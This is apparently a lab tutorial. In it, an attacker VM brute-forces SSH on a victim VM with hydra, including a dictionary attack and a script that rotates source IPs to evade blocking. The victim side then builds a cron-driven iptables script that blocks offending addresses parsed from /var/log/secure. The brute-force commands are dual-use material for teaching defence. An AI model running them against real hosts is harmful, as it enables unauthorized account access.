Building a Security Tool

======================================================================

IPTABLES-LAB> After writing the security tool, run an attack test against it.

Attacker(BT)   : 192.168.56.240
Victim(CentOS) : 192.168.56.200
Attack type : White box test

- Attacker setup -
1. Boot BT
2. Log in over ssh
3. Attack

1. Boot BT
- root/toor
- Create the VB guest OS (Ubuntu, 32-bit setting), add eth1
Attacker# startx

2. Log in over ssh
Attacker# ifconfig eth1:0 192.168.56.240
Attacker# sshd-generate
Attacker# /etc/init.d/ssh start
Attacker# netstat -nat | grep 22
Attacker# passwd 
Log in with Xshell

3. Attack
hydra usage : 
  hydra -l john -p doe 192.168.0.1 ssh
  hydra -L user.txt -P pass.txt 192.168.0.1 ssh

Attack with a single user name and password
Victim# tail -f /var/log/secure
  :
  :

Attacker# hydra -l abc -p aaaa 192.168.56.200 ssh
  :
1 of 1 target successfuly completed, 0 valid passwords found
  :

- When the attacker attacks with hydra, the connection attempts are recorded in the log file.
Victim# tail -f /var/log/secure
  :
  :
Jul 29 09:50:34 localhost sshd[10166]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.101  user=abc
Jul 29 09:50:38 localhost sshd[10166]: Failed password for abc from 192.168.56.101 port 44737 ssh2
Jul 29 09:50:38 localhost sshd[10167]: Connection closed by 192.168.56.101
Jul 29 09:50:38 localhost sshd[10166]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.101  user=abc


Victim# useradd abc
Victim# echo 1234 | passwd --stdin abc
Attacker# hydra -l abc -p 1234 192.168.56.200 ssh
  :
1 of 1 target successfuly completed, 1 valid password found

Attack with dictionary files
- Actual use
Attacker# cat >> user.txt
linux
windows
admin
adminuser
abc

Attacker# cat >> pass.txt
akfdj
3i3u2
kasdjf
1234

Victim# tail -f /var/log/secure
  :

Attacker# hydra -L user.txt -P pass.txt 192.168.56.200 ssh

Attack while changing the IP address
- Check how the log records an attack whose source IP address keeps changing.
Victim# tail -f /var/log/secure
  :

Attacker# for i in `seq 50 59`
do
ifconfig eth1 192.168.56.$i
hydra -l admin -p 1234 192.168.56.200 ssh > /dev/null 2>&1
done

- The log entries that are recorded look like this.
Victim# tail -f /var/log/secure
  :
Jul 29 10:20:39 localhost sshd[10376]: input_userauth_request: invalid user admin
Jul 29 10:20:39 localhost sshd[10375]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:39 localhost sshd[10375]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.50 
Jul 29 10:20:39 localhost sshd[10375]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:41 localhost sshd[10375]: Failed none for invalid user admin from 192.168.56.50 port 48340 ssh2
Jul 29 10:20:41 localhost sshd[10375]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:41 localhost sshd[10375]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:43 localhost sshd[10375]: Failed password for invalid user admin from 192.168.56.50 port 48340 ssh2
Jul 29 10:20:43 localhost sshd[10376]: Connection closed by 192.168.56.50
Jul 29 10:20:43 localhost sshd[10375]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.50 
Jul 29 10:20:43 localhost sshd[10378]: Invalid user admin from 192.168.56.51
Jul 29 10:20:43 localhost sshd[10379]: input_userauth_request: invalid user admin
Jul 29 10:20:43 localhost sshd[10378]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:43 localhost sshd[10378]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.51 
Jul 29 10:20:43 localhost sshd[10378]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:45 localhost sshd[10378]: Failed none for invalid user admin from 192.168.56.51 port 41454 ssh2
Jul 29 10:20:45 localhost sshd[10378]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:45 localhost sshd[10378]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:47 localhost sshd[10378]: Failed password for invalid user admin from 192.168.56.51 port 41454 ssh2
Jul 29 10:20:47 localhost sshd[10379]: Connection closed by 192.168.56.51
Jul 29 10:20:47 localhost sshd[10378]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.51 
Jul 29 10:20:47 localhost sshd[10380]: Invalid user admin from 192.168.56.52
Jul 29 10:20:47 localhost sshd[10381]: input_userauth_request: invalid user admin
Jul 29 10:20:47 localhost sshd[10380]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:47 localhost sshd[10380]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.52 
Jul 29 10:20:47 localhost sshd[10380]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:49 localhost sshd[10380]: Failed none for invalid user admin from 192.168.56.52 port 43956 ssh2
Jul 29 10:20:49 localhost sshd[10380]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:49 localhost sshd[10380]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:51 localhost sshd[10380]: Failed password for invalid user admin from 192.168.56.52 port 43956 ssh2
Jul 29 10:20:51 localhost sshd[10381]: Connection closed by 192.168.56.52
Jul 29 10:20:51 localhost sshd[10380]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.52 
Jul 29 10:20:52 localhost sshd[10382]: Invalid user admin from 192.168.56.53
Jul 29 10:20:52 localhost sshd[10383]: input_userauth_request: invalid user admin
Jul 29 10:20:52 localhost sshd[10382]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:52 localhost sshd[10382]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.53 
Jul 29 10:20:52 localhost sshd[10382]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:54 localhost sshd[10382]: Failed none for invalid user admin from 192.168.56.53 port 48510 ssh2
Jul 29 10:20:54 localhost sshd[10382]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:54 localhost sshd[10382]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:55 localhost sshd[10382]: Failed password for invalid user admin from 192.168.56.53 port 48510 ssh2
Jul 29 10:20:55 localhost sshd[10383]: Connection closed by 192.168.56.53
Jul 29 10:20:55 localhost sshd[10382]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.53 
Jul 29 10:20:56 localhost sshd[10384]: Invalid user admin from 192.168.56.54
Jul 29 10:20:56 localhost sshd[10385]: input_userauth_request: invalid user admin
Jul 29 10:20:56 localhost sshd[10384]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:56 localhost sshd[10384]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.54 
Jul 29 10:20:56 localhost sshd[10384]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:20:58 localhost sshd[10384]: Failed none for invalid user admin from 192.168.56.54 port 46069 ssh2
Jul 29 10:20:58 localhost sshd[10384]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:20:58 localhost sshd[10384]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:00 localhost sshd[10384]: Failed password for invalid user admin from 192.168.56.54 port 46069 ssh2
Jul 29 10:21:00 localhost sshd[10385]: Connection closed by 192.168.56.54
Jul 29 10:21:00 localhost sshd[10384]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.54 
Jul 29 10:21:00 localhost sshd[10386]: Invalid user admin from 192.168.56.55
Jul 29 10:21:00 localhost sshd[10387]: input_userauth_request: invalid user admin
Jul 29 10:21:00 localhost sshd[10386]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:00 localhost sshd[10386]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.55 
Jul 29 10:21:00 localhost sshd[10386]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:02 localhost sshd[10386]: Failed none for invalid user admin from 192.168.56.55 port 49600 ssh2
Jul 29 10:21:02 localhost sshd[10386]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:02 localhost sshd[10386]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:04 localhost sshd[10386]: Failed password for invalid user admin from 192.168.56.55 port 49600 ssh2
Jul 29 10:21:04 localhost sshd[10387]: Connection closed by 192.168.56.55
Jul 29 10:21:04 localhost sshd[10386]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.55 
Jul 29 10:21:04 localhost sshd[10388]: Invalid user admin from 192.168.56.56
Jul 29 10:21:04 localhost sshd[10389]: input_userauth_request: invalid user admin
Jul 29 10:21:04 localhost sshd[10388]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:04 localhost sshd[10388]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.56 
Jul 29 10:21:04 localhost sshd[10388]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:06 localhost sshd[10388]: Failed none for invalid user admin from 192.168.56.56 port 59305 ssh2
Jul 29 10:21:06 localhost sshd[10388]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:06 localhost sshd[10388]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:08 localhost sshd[10388]: Failed password for invalid user admin from 192.168.56.56 port 59305 ssh2
Jul 29 10:21:08 localhost sshd[10389]: Connection closed by 192.168.56.56
Jul 29 10:21:08 localhost sshd[10388]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.56 
Jul 29 10:21:08 localhost sshd[10390]: Invalid user admin from 192.168.56.57
Jul 29 10:21:08 localhost sshd[10391]: input_userauth_request: invalid user admin
Jul 29 10:21:08 localhost sshd[10390]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:08 localhost sshd[10390]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.57 
Jul 29 10:21:08 localhost sshd[10390]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:11 localhost sshd[10390]: Failed none for invalid user admin from 192.168.56.57 port 52213 ssh2
Jul 29 10:21:11 localhost sshd[10390]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:11 localhost sshd[10390]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:13 localhost sshd[10390]: Failed password for invalid user admin from 192.168.56.57 port 52213 ssh2
Jul 29 10:21:13 localhost sshd[10391]: Connection closed by 192.168.56.57
Jul 29 10:21:13 localhost sshd[10390]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.57 
Jul 29 10:21:13 localhost sshd[10392]: Invalid user admin from 192.168.56.58
Jul 29 10:21:13 localhost sshd[10393]: input_userauth_request: invalid user admin
Jul 29 10:21:13 localhost sshd[10392]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:13 localhost sshd[10392]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.58 
Jul 29 10:21:13 localhost sshd[10392]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:15 localhost sshd[10392]: Failed none for invalid user admin from 192.168.56.58 port 55600 ssh2
Jul 29 10:21:15 localhost sshd[10392]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:15 localhost sshd[10392]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:17 localhost sshd[10392]: Failed password for invalid user admin from 192.168.56.58 port 55600 ssh2
Jul 29 10:21:17 localhost sshd[10393]: Connection closed by 192.168.56.58
Jul 29 10:21:17 localhost sshd[10392]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.58 
Jul 29 10:21:17 localhost sshd[10394]: Invalid user admin from 192.168.56.59
Jul 29 10:21:17 localhost sshd[10395]: input_userauth_request: invalid user admin
Jul 29 10:21:17 localhost sshd[10394]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:17 localhost sshd[10394]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.59 
Jul 29 10:21:17 localhost sshd[10394]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:20 localhost sshd[10394]: Failed none for invalid user admin from 192.168.56.59 port 45389 ssh2
Jul 29 10:21:20 localhost sshd[10394]: pam_unix(sshd:auth): check pass; user unknown
Jul 29 10:21:20 localhost sshd[10394]: pam_succeed_if(sshd:auth): error retrieving information about user admin
Jul 29 10:21:22 localhost sshd[10394]: Failed password for invalid user admin from 192.168.56.59 port 45389 ssh2
Jul 29 10:21:22 localhost sshd[10395]: Connection closed by 192.168.56.59
Jul 29 10:21:22 localhost sshd[10394]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.59 


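- Victim setup -
1. Create a user
2. Check the log
3. Register attackers in the firewall automatically


1. Create a user
Victim# useradd abc
Victim# echo 1234 | passwd --stdin abc

2. Check the log
- If nothing is recorded in /var/log/secure, check /var/log/messages.
- Three kinds of log entries are left when the Attacker attacks:
- Check the log when the user does not exist
- Check the log when the user exists but the password is wrong
- Check the log when both the user and the password are correct

Victim# tail -f /var/log/secure 

3. Register attackers in the firewall automatically
- See the "Let's build a security tool" LAB below.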
Victim# firewall.sh
Victim# iptables -nvL DROP-IP
Chain DROP-IP (1 references)
target     prot opt source               destination         
DROP       all  --  192.168.56.59        0.0.0.0/0           
DROP       all  --  192.168.56.58        0.0.0.0/0           
DROP       all  --  192.168.56.57        0.0.0.0/0           
DROP       all  --  192.168.56.56        0.0.0.0/0           
DROP       all  --  192.168.56.55        0.0.0.0/0           
DROP       all  --  192.168.56.54        0.0.0.0/0           
DROP       all  --  192.168.56.53        0.0.0.0/0           
DROP       all  --  192.168.56.52        0.0.0.0/0           
DROP       all  --  192.168.56.51        0.0.0.0/0           
DROP       all  --  192.168.56.50        0.0.0.0/0           
DROP       all  --  192.168.56.240       0.0.0.0/0           

======================================================================

======================================================================
IPTABLES-LAB> Let's build a security tool.

-- Procedure --
1. Set the firewall policy
2. Create the security tool (using a shell script)
3. Register it in cron
4. Verify
-- Procedure --
              
INPUT -------------> OUTPUT
 | ^        4    
 | |        
 | |        3  
 | +-------------------+ 
 |                     |
 +--> ACCEPT-IP --> DROP-IP
  1              2 

Victim# iptables -F
Victim# iptables -N ACCEPT-IP
Victim# iptables -N DROP-IP
Victim# iptables -A INPUT -j ACCEPT-IP     <-- from INPUT to ACCEPT-IP
Victim# iptables -A ACCEPT-IP -j DROP-IP   <-- from ACCEPT-IP to DROP-IP

- Check the chains that were created.
Victim# iptables -nL
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

Chain ACCEPT-IP (0 references)
target     prot opt source               destination         

Chain DROP-IP (0 references)
target     prot opt source               destination 


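1. Set the firewall policy
- Write test firewall rules.
- 192.168.56.1   (assumed to be the administrator's IP address) : ACCEPT
- 192.168.56.201 (assumed to be the attacker's IP address) : DROP

- 192.168.56.1, the IP address the administrator uses, is trusted, so it is always allowed.
Victim# iptables -I ACCEPT-IP -s 192.168.56.1 -j ACCEPT

- Assume the attacker's IP address is 192.168.56.201 and block it.
Victim# iptables -I DROP-IP -s 192.168.56.201 -j DROP

- Change the attacker's IP address to the one registered in DROP-IP and attack.
- The attacker attacks, but the Victim's firewall rule drops the traffic, so nothing is written to the log.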
Victim# tail -f /var/log/secure
  :
  :
Attacker# ifconfig eth1 192.168.56.201
Attacker# hydra -l test -p 1234 192.168.56.200 ssh 

Victim# iptables -nvL DROP-IP
Chain DROP-IP (1 references)
 pkts bytes target     prot opt in     out     source               destination         
   19  3115 DROP       all  --  *      *       192.168.56.201       0.0.0.0/0     

2. Create the security tool
- Here we write it as a shell script.
Victim# mkdir ~/bin
Victim# install /dev/null ~/bin/firewall.sh
Victim# vi ~/bin/firewall.sh 
-- ~/bin/firewall.sh --
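#!/bin/bash
# bash, not sh: valid_ipaddr() uses the [[ =~ ]] operator

# Program that automatically creates rules blocking attacker IPs, written as a shell script
IPTABLE_CHAIN=DROP-IP
# "Invalid user <name> from <ip>" : the address is field 10
BLOCK_IP1=$(grep Invalid /var/log/secure | awk '{print $10}' | sort | uniq )
# "Failed ... for [invalid user] <name> from <ip> port ..." : the address is
# field 13 for an invalid user but field 11 for an existing one, so print the
# field that follows "from" instead of a fixed position
BLOCK_IP2=$(grep Fail /var/log/secure | awk '{for (n = 7; n < NF; n++) if ($n == "from") print $(n + 1)}' | sort | uniq )

# Check an IP address
# Return value : 0 (true), 1 (false)

valid_ipaddr() 
{
  # From the start (^), the [0-9] expression repeats 1 to 3 times
  # Since bash version 3 (2004), bash has had a built-in regular expression
  # comparison operator written =~ .
  # So in practice much of the work done in scripts with grep or sed can be
  # handled with this operator
  if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
  then
    return 0   # valid ip address
  else
    return 1   # invalid ip address
  fi
}

for i in $BLOCK_IP1 $BLOCK_IP2
do
   # Debugging
   # echo $i

   # IP address validation:
   # if the value is not an IP address, skip it and go back to the for loop.
   valid_ipaddr "$i"
   [ $? -eq 1 ] && continue  

   # Duplicate check (-F -w: literal whole-word match, so 192.168.56.5
   # is not mistaken for an already registered 192.168.56.50)
   /sbin/iptables -nL "$IPTABLE_CHAIN" | grep -wF -- "$i" > /dev/null 2>&1
   ret_value=$?
   [ $ret_value -eq 0 ] && continue

   # Register the attacker IP
   /sbin/iptables -I "$IPTABLE_CHAIN" -s "$i" -j DROP
done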
-- ~/bin/firewall.sh --

Script test
# iptables -nL DROP-IP
Chain DROP-IP (1 references)
target     prot opt source               destination   

- Run the shell script that blocks the attacks.
# firewall.sh
# iptables -nL DROP-IP
Chain DROP-IP (1 references)
target     prot opt source               destination         
DROP       all  --  192.168.56.59        0.0.0.0/0           
DROP       all  --  192.168.56.58        0.0.0.0/0           
DROP       all  --  192.168.56.57        0.0.0.0/0           
DROP       all  --  192.168.56.56        0.0.0.0/0           
DROP       all  --  192.168.56.55        0.0.0.0/0           
DROP       all  --  192.168.56.54        0.0.0.0/0           
DROP       all  --  192.168.56.53        0.0.0.0/0           
DROP       all  --  192.168.56.52        0.0.0.0/0           
DROP       all  --  192.168.56.51        0.0.0.0/0           
DROP       all  --  192.168.56.50        0.0.0.0/0   

- Once the attacker IP addresses have been added correctly, flush the chain.
# iptables -F DROP-IP
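
The parsing step of firewall.sh, as an added example that is not part of the original post: it counts only "Failed password" lines, takes the address from the fixed tail "from <ip> port <n> ssh2" (in the log above the address is field 13 for an invalid user but field 11 for an existing user such as abc), applies a threshold and a whitelist, and prints the iptables commands instead of running them. THRESHOLD, WHITELIST, the function names and the sample log lines are assumptions made for this illustration.

```bash
#!/bin/sh
# Added example (not from the original post). THRESHOLD, WHITELIST and the
# function names are assumptions made for this illustration.
THRESHOLD=3                # failed passwords per source before it is listed
WHITELIST="192.168.56.1"   # administrator address used in the lab

# Constructed sample lines in the /var/log/secure format shown on this page.
sample_log() {
  cat <<'EOF'
Jul 29 10:20:43 localhost sshd[10378]: Invalid user admin from 192.168.56.51
Jul 29 10:20:47 localhost sshd[10378]: Failed password for invalid user admin from 192.168.56.51 port 41454 ssh2
Jul 29 10:21:01 localhost sshd[10401]: Failed password for abc from 192.168.56.101 port 44737 ssh2
Jul 29 10:21:03 localhost sshd[10402]: Failed password for abc from 192.168.56.101 port 44738 ssh2
Jul 29 10:21:05 localhost sshd[10403]: Failed password for abc from 192.168.56.101 port 44739 ssh2
Jul 29 10:21:07 localhost sshd[10404]: Failed password for root from 192.168.56.1 port 50001 ssh2
Jul 29 10:21:09 localhost sshd[10405]: Failed password for root from 192.168.56.1 port 50002 ssh2
Jul 29 10:21:11 localhost sshd[10406]: Failed password for root from 192.168.56.1 port 50003 ssh2
Jul 29 10:21:13 localhost sshd[10407]: Accepted password for abc from 192.168.56.77 port 50100 ssh2
EOF
}

# Print the source address of every "Failed password" line read from stdin.
# The pattern is anchored on the fixed tail "from <ip> port <n> ssh2", so the
# result does not depend on how many words precede it (user vs. invalid user).
failed_sources() {
  sed -nE 's/^.* sshd\[[0-9]+\]: Failed password for .* from ([0-9]{1,3}(\.[0-9]{1,3}){3}) port [0-9]+ ssh2$/\1/p'
}

# Print addresses with at least THRESHOLD failures, minus the whitelist.
block_candidates() {
  failed_sources | sort | uniq -c |
    awk -v t="$THRESHOLD" '$1 >= t { print $2 }' |
    grep -vxF -- "$WHITELIST"
}

# Dry run: print the rules instead of applying them.
emit_rules() {
  while read -r ip
  do
    echo "/sbin/iptables -I DROP-IP -s $ip -j DROP"
  done
}

sample_log | block_candidates | emit_rules
```

To use it on the lab machine, feed /var/log/secure to block_candidates in place of sample_log and review the printed rules before applying them.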

3. Register it in cron
Victim# crontab -e 
* * * * * /root/bin/firewall.sh

4. Verify
Victim# iptables -nL DROP-IP
======================================================================


======================================================================
IPTABLES-LAB> Change the attacking IP and attack.

IP change script : changeip.sh
IPs used : 192.168.56.20 ~ 50 

Attacker# install /dev/null changeip.sh
Attacker# vi changeip.sh
-- changeip.sh --
#!/bin/sh

for i in $(seq 20 50)
do
  ifconfig eth1 192.168.56.$i
  hydra -l root  -p 1234 192.168.56.200 ssh
  hydra -l poweruser -p 1234 192.168.56.200 ssh
  hydra -l linuser1234 -p 1234 192.168.56.200 ssh
done
-- changeip.sh --

Attacker#  changeip.sh

Victim# tail -f /var/log/secure

Victim# firewall.sh   <-- run it directly if it has not been registered in cron

- Verify
Victim# iptables -nvL DROP-IP
Victim# iptables -nvL DROP-IP | wc -l
======================================================================
======================================================================
LAB> Write a function that tests IP addresses.

-- iptest.txt --
1.1.1.1  
2.2.2.2  
abc      
3333     
211.33.11.
-- iptest.txt --

-- ipaddr_check.sh --
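#!/bin/bash
# bash, not sh: valid_ipaddr() uses the [[ =~ ]] operator

valid_ipaddr() 
{
  # From the start (^), the [0-9] expression repeats 1 to 3 times
  # Since bash version 3 (2004), bash has had a built-in regular expression
  # comparison operator written =~ .
  # So in practice much of the work done in scripts with grep or sed can be
  # handled with this operator
  if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
  then
    return 0   # valid ip address
  else
    return 1   # invalid ip address
  fi
}

for i in $(cat iptest.txt)
do
  # Pass the value as an argument, never as the printf format string
  printf 'i =  %s : ' "$i"
  valid_ipaddr "$i"
  echo $?
done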
-- ipaddr_check.sh --

IP address check
- Check the IP addresses.
- 0 : valid IP address
- 1 : invalid IP address
# ./ipaddr_check.sh 
i =  1.1.1.1 : 0
i =  2.2.2.2 : 0
i =  abc : 1
i =  3333 : 1
i =  211.33.11. : 1
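
An added example (not part of the original post) that extends the check above: the pattern used on this page tests only the shape of the string, so 999.999.999.999 passes, while strict_ipaddr also requires every octet to be 0-255 with no leading zero. The function names and the extra test tokens are assumptions made for this illustration.

```bash
#!/bin/sh
# Added example (not from the original post). Function names are assumptions.

# The check used on this page: four dot-separated groups of 1 to 3 digits.
shape_only() {
  printf '%s\n' "$1" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$'
}

# Shape plus range: each octet 0-255, no leading zeros.
strict_ipaddr() {
  shape_only "$1" || return 1
  old_ifs=$IFS
  IFS=.
  set -- $1            # split on dots into $1 .. $4 (digits and dots only here)
  IFS=$old_ifs
  for octet in "$@"
  do
    case $octet in
      0) ;;                       # a single zero is fine
      0*) return 1 ;;             # leading zero: ambiguous (octal?) form
    esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Constructed input: the iptest.txt entries plus cases the shape check misses.
sample_tokens() {
  printf '%s\n' 1.1.1.1 2.2.2.2 abc 3333 211.33.11. \
    999.999.999.999 192.168.56.050 44737 192.168.56.200
}

# Print "<token> <shape verdict> <strict verdict>" using the page's 0/1 codes.
compare_checks() {
  while read -r token
  do
    a=0; shape_only "$token" || a=1
    b=0; strict_ipaddr "$token" || b=1
    echo "$token $a $b"
  done
}

sample_tokens | compare_checks
```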

======================================================================

